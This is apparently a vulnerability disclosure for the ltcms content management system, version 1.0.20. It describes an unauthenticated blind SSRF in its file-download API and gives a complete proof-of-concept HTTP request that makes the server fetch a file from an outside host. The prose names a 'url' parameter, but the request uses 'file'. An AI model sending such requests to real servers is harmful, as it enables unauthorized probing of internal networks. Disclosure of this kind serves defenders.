ltcms.com
ltcms
V1.0.20
Download Source Code: git clone https://gitee.com/wanglongcn/ltcms.git
SSRF
In ltcms, there is an API endpoint "api/file/downloadUrl" that can be used to perform a blind SSRF attack. The corresponding page for this endpoint is located in "app/utils/base/helper/Ltcms_download.php". This endpoint does not require authentication, allowing anyone to call curl_exec() to request a URL specified in the url parameter. Additionally, due to the lack of protocol filtering, protocols like file, dict, etc., can be used to initiate requests to the internal network.
GET /api/file/downloadUrl?file=http://124.221.70.199:8888/c.php HTTP/1.1
Host: 192.168.17.22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close